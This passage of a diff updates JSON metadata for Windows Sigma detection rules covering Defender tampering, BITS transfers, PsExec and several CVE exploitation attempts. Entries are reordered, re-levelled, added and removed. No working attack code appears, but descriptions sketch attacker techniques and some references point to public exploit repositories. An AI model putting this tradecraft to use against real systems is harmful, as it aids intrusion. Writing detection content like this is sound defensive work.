- "https://www.virustotal.com/gui/file/5092b2672b4cb87a8dd1c2e6047b487b95995ad8ed5e9fc217f46b8bfb1b8c01",
"https://www.virustotal.com/gui/file/13828b390d5f58b002e808c2c4f02fdd920e236cc8015480fa33b6c1a9300e31",
"https://www.virustotal.com/gui/file/15b57c1b68cd6ce3c161042e0f3be9f32d78151fe95461eedc59a79fc222c7ed",
+ "https://www.virustotal.com/gui/file/5092b2672b4cb87a8dd1c2e6047b487b95995ad8ed5e9fc217f46b8bfb1b8c01",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/Other/win_av_relevant_match.yml"
],
"tags": [
@@ -10746,9 +10571,9 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "https://docs.microsoft.com/en-us/sql/t-sql/statements/drop-server-audit-transact-sql?view=sql-server-ver16",
"https://docs.microsoft.com/en-us/sql/t-sql/statements/alter-server-audit-transact-sql?view=sql-server-ver16",
"https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/",
+ "https://docs.microsoft.com/en-us/sql/t-sql/statements/drop-server-audit-transact-sql?view=sql-server-ver16",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/mssqlserver/win_mssql_disable_audit_settings.yml"
],
"tags": [
@@ -10869,8 +10694,8 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "https://www.techrepublic.com/article/how-to-track-down-usb-flash-drive-usage-in-windows-10s-event-viewer/",
"https://df-stream.com/2014/01/the-windows-7-event-log-and-usb-device/",
+ "https://www.techrepublic.com/article/how-to-track-down-usb-flash-drive-usage-in-windows-10s-event-viewer/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/driverframeworks/win_usb_device_plugged.yml"
],
"tags": [
@@ -11040,30 +10865,6 @@
"uuid": "71886b70-d7b4-4dbf-acce-87d2ca135262",
"value": "Suspicious Rejected SMB Guest Logon From IP"
},
- {
- "description": "Detects (failed) outbound connection attempts to internet facing SMB servers. This could be a sign of potential exploitation attempts of CVE-2023-23397.",
- "meta": {
- "author": "Nasreddine Bencherchali (Nextron Systems)",
- "creation_date": "2023/04/05",
- "falsepositive": [
- "Some false positives may occur from external trusted servers. Apply additional filters accordingly"
- ],
- "filename": "win_smbclient_connectivity_exploit_cve_2023_23397_outlook_remote_file.yml",
- "level": "medium",
- "logsource.category": "No established category",
- "logsource.product": "windows",
- "refs": [
- "https://www.microsoft.com/en-us/security/blog/2023/03/24/guidance-for-investigating-attacks-using-cve-2023-23397/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/smbclient/connectivity/win_smbclient_connectivity_exploit_cve_2023_23397_outlook_remote_file.yml"
- ],
- "tags": [
- "attack.exfiltration",
- "cve.2023.23397"
- ]
- },
- "uuid": "de96b824-02b0-4241-9356-7e9b47f04bac",
- "value": "Potential CVE-2023-23397 Exploitation Attempt - SMB"
- },
{
"description": "Detects suspicious application installed by looking at the added shortcut to the app resolver cache",
"meta": {
@@ -11100,11 +10901,11 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "https://virtualizationreview.com/articles/2020/05/21/ssh-server-on-windows-10.aspx",
"https://winaero.com/enable-openssh-server-windows-10/",
+ "https://virtualizationreview.com/articles/2020/05/21/ssh-server-on-windows-10.aspx",
"https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16",
- "https://docs.microsoft.com/en-us/windows-server/administration/openssh/openssh_install_firstuse",
"https://github.com/mdecrevoisier/EVTX-to-MITRE-Attack/tree/master/TA0008-Lateral%20Movement/T1021.004-Remote%20Service%20SSH",
+ "https://docs.microsoft.com/en-us/windows-server/administration/openssh/openssh_install_firstuse",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/openssh/win_sshd_openssh_server_listening_on_socket.yml"
],
"tags": [
@@ -11124,76 +10925,6 @@
"uuid": "3ce8e9a4-bc61-4c9b-8e69-d7e2492a8781",
"value": "OpenSSH Server Listening On Socket"
},
- {
- "description": "Detects events of driver load errors in print service logs that could be a sign of successful exploitation attempts of print spooler vulnerability CVE-2021-1675",
- "meta": {
- "author": "Florian Roth (Nextron Systems), KevTheHermit, fuzzyf10w, Tim Shelton",
- "creation_date": "2021/06/30",
- "falsepositive": [
- "Problems with printer drivers"
- ],
- "filename": "win_exploit_cve_2021_1675_printspooler.yml",
- "level": "high",
- "logsource.category": "No established category",
- "logsource.product": "windows",
- "refs": [
- "https://github.com/hhlxf/PrintNightmare",
- "https://github.com/afwu/PrintNightmare",
- "https://twitter.com/fuzzyf10w/status/1410202370835898371",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/printservice/win_exploit_cve_2021_1675_printspooler.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1569",
- "cve.2021.1675"
- ]
- },
- "related": [
- {
- "dest-uuid": "d157f9d2-d09a-4efa-bb2a-64963f94e253",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "4e64668a-4da1-49f5-a8df-9e2d5b866718",
- "value": "Possible CVE-2021-1675 Print Spooler Exploitation"
- },
- {
- "description": "Detects driver load events print service operational log that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2021/07/01",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "win_exploit_cve_2021_1675_printspooler_operational.yml",
- "level": "critical",
- "logsource.category": "No established category",
- "logsource.product": "windows",
- "refs": [
- "https://twitter.com/MalwareJake/status/1410421967463731200",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/printservice/win_exploit_cve_2021_1675_printspooler_operational.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1569",
- "cve.2021.1675"
- ]
- },
- "related": [
- {
- "dest-uuid": "d157f9d2-d09a-4efa-bb2a-64963f94e253",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "f34d942d-c8c4-4f1f-b196-22471aecf10a",
- "value": "CVE-2021-1675 Print Spooler Exploitation"
- },
{
"description": "Detect standard users login that are part of high privileged groups such as the Administrator group",
"meta": {
@@ -11203,12 +10934,12 @@
"Standard domain users who are part of the administrator group. These users shouldn't have these right. But in the case where it's necessary. They should be filtered out using the \"TargetUserName\" field"
],
"filename": "win_lsa_server_normal_user_admin.yml",
- "level": "high",
+ "level": "medium",
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "https://learn.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection",
"https://github.com/nasbench/EVTX-ETW-Resources/blob/7a806a148b3d9d381193d4a80356016e6e8b1ee8/ETWProvidersManifests/Windows11/22H2/W11_22H2_Pro_20221220_22621.963/WEPExplorer/LsaSrv.xml",
+ "https://learn.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection",
"https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/manage/understand-security-identifiers",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/lsa_server/win_lsa_server_normal_user_admin.yml"
],
@@ -11257,8 +10988,8 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide",
"https://bhabeshraj.com/post/tampering-with-microsoft-defenders-tamper-protection",
+ "https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_tamper_protection_trigger.yml"
],
"tags": [
@@ -11360,8 +11091,8 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/duff22b/status/1280166329660497920",
"https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction?WT.mc_id=twitter#block-process-creations-originating-from-psexec-and-wmi-commands",
+ "https://twitter.com/duff22b/status/1280166329660497920",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_psexec_wmi_asr.yml"
],
"tags": [
@@ -11423,6 +11154,41 @@
"uuid": "1321dc4e-a1fe-481d-a016-52c45f0c8b4f",
"value": "Windows Defender Exclusions Added"
},
+ {
+ "description": "Detects issues with Windows Defender Real-Time Protection features",
+ "meta": {
+ "author": "Nasreddine Bencherchali (Nextron Systems), Christopher Peacock '@securepeacock' (Update)",
+ "creation_date": "2023/03/28",
+ "falsepositive": [
+ "Some crashes can occur sometimes and the event doesn't provide enough information to tune out these cases. Manual exception is required"
+ ],
+ "filename": "win_defender_real_time_protection_errors.yml",
+ "level": "medium",
+ "logsource.category": "No established category",
+ "logsource.product": "windows",
+ "refs": [
+ "https://gist.github.com/nasbench/33732d6705cbdc712fae356f07666346",
+ "Internal Research",
+ "https://www.microsoft.com/en-us/security/blog/2023/04/11/guidance-for-investigating-attacks-using-cve-2022-21894-the-blacklotus-campaign/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_real_time_protection_errors.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1562.001"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "dd80db93-6ec2-4f4c-a017-ad40da6ffe81",
+ "value": "Windows Defender Real-Time Protection Failure/Restart"
+ },
{
"description": "Windows Defender logs when the history of detected infections is deleted. Log file will contain the message \"Windows Defender Antivirus has removed history of malware and other potentially unwanted software\".",
"meta": {
@@ -11559,8 +11325,8 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "https://bidouillesecurity.com/disable-windows-defender-in-powershell/#DisableAntiSpyware",
"https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide",
+ "https://bidouillesecurity.com/disable-windows-defender-in-powershell/#DisableAntiSpyware",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_suspicious_features_tampering.yml"
],
"tags": [
@@ -11660,8 +11426,8 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/malmoeb/status/1535142803075960832",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md",
+ "https://twitter.com/malmoeb/status/1535142803075960832",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_new_transfer_via_uncommon_tld.yml"
],
"tags": [
@@ -11763,10 +11529,10 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "https://isc.sans.edu/diary/22264",
"https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/",
- "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin",
+ "https://isc.sans.edu/diary/22264",
"https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/",
+ "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_new_transfer_via_ip_address.yml"
],
"tags": [
@@ -11834,9 +11600,9 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md",
"https://twitter.com/malmoeb/status/1535142803075960832",
"https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker",
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_new_transfer_via_file_sharing_domains.yml"
],
"tags": [
@@ -11870,8 +11636,8 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/tekdefense/status/1519711183162556416?s=12&t=OTsHCBkQOTNs1k3USz65Zg",
"https://ngrok.com/",
+ "https://twitter.com/tekdefense/status/1519711183162556416?s=12&t=OTsHCBkQOTNs1k3USz65Zg",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/terminalservices/win_terminalservices_rdp_ngrok.yml"
],
"tags": [
@@ -11904,9 +11670,9 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
+ "https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83",
"https://technet.microsoft.com/en-us/library/cc735829(v=ws.10).aspx",
"https://twitter.com/gentilkiwi/status/861641945944391680",
- "https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/dns_server/win_dns_server_susp_server_level_plugin_dll.yml"
],
"tags": [
@@ -12023,29 +11789,6 @@
"uuid": "39f919f3-980b-4e6f-a975-8af7e507ef2b",
"value": "QuarksPwDump Clearing Access History"
},
- {
- "description": "Detects the exploitation of a security bypass and elevation of privilege vulnerability with Authentication Negotiation by using weak RC4-HMAC negotiation",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2022/11/09",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "win_system_kdcsvc_rc4_downgrade.yml",
- "level": "high",
- "logsource.category": "No established category",
- "logsource.product": "windows",
- "refs": [
- "https://support.microsoft.com/en-us/topic/kb5021131-how-to-manage-the-kerberos-protocol-changes-related-to-cve-2022-37966-fd837ac3-cdec-4e76-a6ec-86e67501407d",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/kerberos_key_distribution_center/win_system_kdcsvc_rc4_downgrade.yml"
- ],
- "tags": [
- "attack.privilege_escalation"
- ]
- },
- "uuid": "e6f81941-b1cd-4766-87db-9fc156f658ee",
- "value": "KDC RC4-HMAC Downgrade CVE-2022-37966"
- },
{
"description": "Detect suspicious error on protocol RDP, potential CVE-2019-0708",
"meta": {
@@ -12059,8 +11802,8 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "https://github.com/zerosum0x0/CVE-2019-0708",
"https://github.com/Ekultek/BlueKeep",
+ "https://github.com/zerosum0x0/CVE-2019-0708",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/termdd/win_system_rdp_potential_cve_2019_0708.yml"
],
"tags": [
@@ -12115,15 +11858,15 @@
"value": "Volume Shadow Copy Mount"
},
{
- "description": "During exploitation of this vuln, two logs (providername:Microsoft-Windows-User Profiles Service) with eventid 1511 and 1515 (maybe lot of false positives with this event) are created. Moreover, it appears the directory \\Users\\TEMP is created may be created during the exploitation.Viewed on 2008 Server",
+ "description": "During exploitation of this vulnerability, two logs (Provider_Name:Microsoft-Windows-User Profiles Service) with EventID 1511 and 1515 (maybe lot of false positives with this event) are created. Moreover, it appears the directory \\Users\\TEMP is created may be created during the exploitation. Viewed on 2008 Server",
"meta": {
"author": "Cybex",
"creation_date": "2022/08/16",
"falsepositive": [
- "Unknown"
+ "Corrupted user profiles - https://social.technet.microsoft.com/wiki/contents/articles/3571.windows-user-profiles-service-event-1511-windows-cannot-find-the-local-profile-and-is-logging-you-on-with-a-temporary-profile.aspx"
],
"filename": "win_system_susp_vuln_cve_2022_21919_or_cve_2021_34484.yml",
- "level": "high",
+ "level": "low",
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
@@ -12150,9 +11893,9 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "https://www.bleepingcomputer.com/news/security/windows-10-bug-corrupts-your-hard-drive-on-seeing-this-files-icon/",
"https://twitter.com/wdormann/status/1347958161609809921",
"https://twitter.com/jonasLyk/status/1347900440000811010",
+ "https://www.bleepingcomputer.com/news/security/windows-10-bug-corrupts-your-hard-drive-on-seeing-this-files-icon/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/ntfs/win_system_ntfs_vuln_exploit.yml"
],
"tags": [
@@ -12495,6 +12238,29 @@
"uuid": "530a6faa-ff3d-4022-b315-50828e77eef5",
"value": "Anydesk Remote Access Software Service Installation"
},
+ {
+ "description": "Detects important or interesting windows services that got terminated unexpectedly.",
+ "meta": {
+ "author": "Nasreddine Bencherchali (Nextron Systems)",
+ "creation_date": "2023/04/14",
+ "falsepositive": [
+ "Rare false positives could occur since service termination could happen due to multiple reasons"
+ ],
+ "filename": "win_system_service_terminated_unexpectedly.yml",
+ "level": "high",
+ "logsource.category": "No established category",
+ "logsource.product": "windows",
+ "refs": [
+ "https://www.randori.com/blog/vulnerability-analysis-queuejumper-cve-2023-21554/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_service_terminated_unexpectedly.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion"
+ ]
+ },
+ "uuid": "56abae0c-6212-4b97-adc0-0b559bb950c3",
+ "value": "Important Windows Service Terminated Unexpectedly"
+ },
{
"description": "Detects PDQDeploy service installation on the target system.\nWhen a package is deployed via PDQDeploy it installs a remote service on the target machine with the name \"PDQDeployRunner-X\" where \"X\" is an integer starting from 1\n",
"meta": {
@@ -12748,8 +12514,8 @@
"logsource.product": "windows",
"refs": [
"https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/",
- "https://www.sans.org/webcasts/119395",
"https://www.crowdstrike.com/blog/getting-the-bacon-from-cobalt-strike-beacon/",
+ "https://www.sans.org/webcasts/119395",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_cobaltstrike_service_installs.yml"
],
"tags": [
@@ -13814,67 +13580,6 @@
"uuid": "f7385ee2-0e0c-11eb-adc1-0242ac120002",
"value": "Invoke-Obfuscation CLIP+ Launcher - System"
},
- {
- "description": "Detects OilRig schedule task persistence as reported by Nyotron in their March 2018 report",
- "meta": {
- "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community",
- "creation_date": "2018/03/23",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "win_system_apt_oilrig_mar18.yml",
- "level": "critical",
- "logsource.category": "No established category",
- "logsource.product": "windows",
- "refs": [
- "https://web.archive.org/web/20180402134442/https://nyotron.com/wp-content/uploads/2018/03/Nyotron-OilRig-Malware-Report-March-2018C.pdf",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_apt_oilrig_mar18.yml"
- ],
- "tags": [
- "attack.persistence",
- "attack.g0049",
- "attack.t1053.005",
- "attack.s0111",
- "attack.t1543.003",
- "attack.defense_evasion",
- "attack.t1112",
- "attack.command_and_control",
- "attack.t1071.004"
- ]
- },
- "related": [
- {
- "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "2959d63f-73fd-46a1-abd2-109d7dcede32",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "1996eef1-ced3-4d7f-bf94-33298cabbf72",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "53ba33fd-3a50-4468-a5ef-c583635cfa92",
- "value": "OilRig APT Schedule Task Persistence - System"
- },
{
"description": "Detects PsExec service installation and execution events (service and Sysmon)",
"meta": {
@@ -13888,8 +13593,8 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "https://www.jpcert.or.jp/english/pub/sr/ir_research.html",
"https://jpcertcc.github.io/ToolAnalysisResultSheet",
+ "https://www.jpcert.or.jp/english/pub/sr/ir_research.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_service_install_psexec.yml"
],
"tags": [
@@ -13981,8 +13686,8 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100",
"https://twitter.com/deviouspolack/status/832535435960209408",
+ "https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/microsoft_windows_eventlog/win_system_eventlog_cleared.yml"
],
"tags": [
@@ -14017,8 +13722,8 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100",
"https://twitter.com/deviouspolack/status/832535435960209408",
+ "https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/microsoft_windows_eventlog/win_system_susp_eventlog_cleared.yml"
],
"tags": [
@@ -14050,8 +13755,8 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "https://bi-zone.medium.com/hunting-for-zerologon-f65c61586382",
"https://www.secura.com/blog/zero-logon",
+ "https://bi-zone.medium.com/hunting-for-zerologon-f65c61586382",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/netlogon/win_system_possible_zerologon_exploitation_using_wellknown_tools.yml"
],
"tags": [
@@ -14137,37 +13842,27 @@
"value": "Sysmon Crash"
},
{
- "description": "The attacker creates a computer object using those permissions with a password known to her.\nAfter that she clears the attribute ServicePrincipalName on the computer object.\nBecause she created the object (CREATOR OWNER), she gets granted additional permissions and can do many changes to the object.\n",
+ "description": "Detects the exploitation of a security bypass and elevation of privilege vulnerability with Authentication Negotiation by using weak RC4-HMAC negotiation",
"meta": {
- "author": "frack113",
- "creation_date": "2021/12/15",
+ "author": "Florian Roth (Nextron Systems)",
+ "creation_date": "2022/11/09",
"falsepositive": [
"Unknown"
],
- "filename": "win_system_exploit_cve_2021_42278.yml",
- "level": "medium",
+ "filename": "win_system_kdcsvc_rc4_downgrade.yml",
+ "level": "high",
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "https://cloudbrothers.info/en/exploit-kerberos-samaccountname-spoofing/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/microsoft_windows_kerberos_key_distribution_center/win_system_exploit_cve_2021_42278.yml"
+ "https://support.microsoft.com/en-us/topic/kb5021131-how-to-manage-the-kerberos-protocol-changes-related-to-cve-2022-37966-fd837ac3-cdec-4e76-a6ec-86e67501407d",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/microsoft_windows_kerberos_key_distribution_center/win_system_kdcsvc_rc4_downgrade.yml"
],
"tags": [
- "attack.credential_access",
- "attack.t1558.003"
+ "attack.privilege_escalation"
]
},
- "related": [
- {
- "dest-uuid": "f2877f7f-9a4c-4251-879f-1224e3006bee",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "44bbff3e-4ca3-452d-a49a-6efa4cafa06f",
- "value": "Potential CVE-2021-42278 Exploitation Attempt"
+ "uuid": "e6f81941-b1cd-4766-87db-9fc156f658ee",
+ "value": "KDC RC4-HMAC Downgrade CVE-2022-37966"
},
{
"description": "This rule detects a DHCP server in which a specified Callout DLL (in registry) was loaded",
@@ -14411,8 +14106,8 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/mattifestation/status/899646620148539397",
"https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/",
+ "https://twitter.com/mattifestation/status/899646620148539397",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/wmi/win_wmi_persistence.yml"
],
"tags": [
@@ -14685,11 +14380,11 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "https://github.com/BloodHoundAD/SharpHound3/blob/7d96b991b1887ff50349ce59c80980bc0d95c86a/SharpHound3/LdapBuilder.cs",
"https://github.com/PowerShellMafia/PowerSploit/blob/d943001a7defb5e0d1657085a77a0e78609be58f/Recon/PowerView.ps1",
- "https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/hunting-for-reconnaissance-activities-using-ldap-search-filters/ba-p/824726",
- "https://github.com/fox-it/BloodHound.py/blob/d65eb614831cd30f26028ccb072f5e77ca287e0b/bloodhound/ad/domain.py#L427",
"https://medium.com/falconforce/falconfriday-detecting-active-directory-data-collection-0xff21-c22d1a57494c",
+ "https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/hunting-for-reconnaissance-activities-using-ldap-search-filters/ba-p/824726",
+ "https://github.com/BloodHoundAD/SharpHound3/blob/7d96b991b1887ff50349ce59c80980bc0d95c86a/SharpHound3/LdapBuilder.cs",
+ "https://github.com/fox-it/BloodHound.py/blob/d65eb614831cd30f26028ccb072f5e77ca287e0b/bloodhound/ad/domain.py#L427",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/ldap/win_ldap_recon.yml"
],
"tags": [
@@ -14738,9 +14433,9 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
+ "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/",
"Internal Research",
"https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/",
- "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/",
"https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_uncommon_package_locations.yml"
],
@@ -14764,9 +14459,9 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
+ "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/",
"Internal Research",
"https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/",
- "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/",
"https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_susp_package_locations.yml"
],
@@ -14790,9 +14485,9 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
+ "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/",
"Internal Research",
"https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/",
- "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/",
"https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_susp_domains.yml"
],
@@ -14816,9 +14511,9 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
+ "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/",
"Internal Research",
"https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/",
- "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/",
"https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_susp_appx_package_installation.yml"
],
@@ -14866,9 +14561,9 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
+ "https://forensicitguy.github.io/analyzing-magnitude-magniber-appx/",
"https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/",
"https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/",
- "https://forensicitguy.github.io/analyzing-magnitude-magniber-appx/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_mal_appx_names.yml"
],
"tags": [
@@ -15179,8 +14874,8 @@
"logsource.category": "create_stream_hash",
"logsource.product": "windows",
"refs": [
- "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f",
"https://lolbas-project.github.io/lolbas/Binaries/Regedit/",
+ "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_regedit_export_to_ads.yml"
],
"tags": [
@@ -15541,9 +15236,9 @@
"logsource.category": "registry_event",
"logsource.product": "windows",
"refs": [
- "https://www.dfirnotes.net/portproxy_detection/",
- "https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html",
"https://adepts.of0x.cc/netsh-portproxy-code/",
+ "https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html",
